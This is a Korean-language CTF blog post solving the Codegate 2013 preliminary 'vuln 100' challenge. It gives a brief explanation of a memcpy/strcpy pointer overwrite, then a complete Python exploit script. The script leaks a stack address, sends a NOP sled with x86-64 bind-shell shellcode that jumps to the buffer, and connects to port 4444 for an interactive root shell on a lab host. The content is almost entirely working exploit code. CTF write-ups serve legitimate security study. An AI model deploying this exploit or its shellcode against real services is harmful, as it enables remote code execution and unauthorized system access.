CTF/지난 대회
Codegate 2013 Prequal - vuln 100
__미니__
2015. 10. 30. 18:52
왠지 스택이 릭되지 않는 문제가 가끔 있긴 한데 어쨌든 작동은 한다.
memcpy로 strcpy로 덮일 dest의 주소를 덮어서 원하는 주소에 값을 덮어쓰고, 이를 이용해 RET을 버퍼 주소로 이동시켜 NOP Sled를 타고 쉘코드가 실행되게 한다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 | from hackutil import * from socket import * from telnetlib import * HOST = "192.168.136.152" PORT = 6666 #================================================================ shellcode = ("\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05") #================================================================ banner() print "==================[ Phase 1 : Stack leak ]==================" sock = socket(AF_INET, SOCK_STREAM) sock.connect((HOST, PORT)) payload = "\x00"*0x108 time.sleep(0.1) sock.send('arsenal\n') time.sleep(0.1) sock.recv(1024) sock.send('gyeongbokgung\n') time.sleep(0.1) sock.recv(1024) sock.send('psy\n') time.sleep(0.1) sock.recv(1024) sock.send(payload) time.sleep(0.1) data = up64(sock.recv(2048)[0x108:0x110])[0] print "[*] Find Stack : "+hex(data) sock.close() print "=============[ Phase 2 : Attack with Shellcode ]============" sock2 = socket(AF_INET, SOCK_STREAM) sock2.connect((HOST, PORT)) payload = "\x90"*20 + shellcode + "\x90"*(0x108-20-len(shellcode)) + p64(data+16) print "Payload Length : "+hex(len(payload)) time.sleep(0.1) sock2.send('arsenal\n') time.sleep(0.1) sock2.recv(1024) sock2.send('gyeongbokgung\n') time.sleep(0.1) sock2.recv(1024) sock2.send('psy\n') time.sleep(0.1) sock2.recv(1024) sock2.send(payload) time.sleep(2) print "=================[ Phase 3 : Got the Shell ]================" sock3 = socket(AF_INET, SOCK_STREAM) sock3.connect((HOST, 4444)) t = Telnet() t.sock = sock3 t.interact() | cs |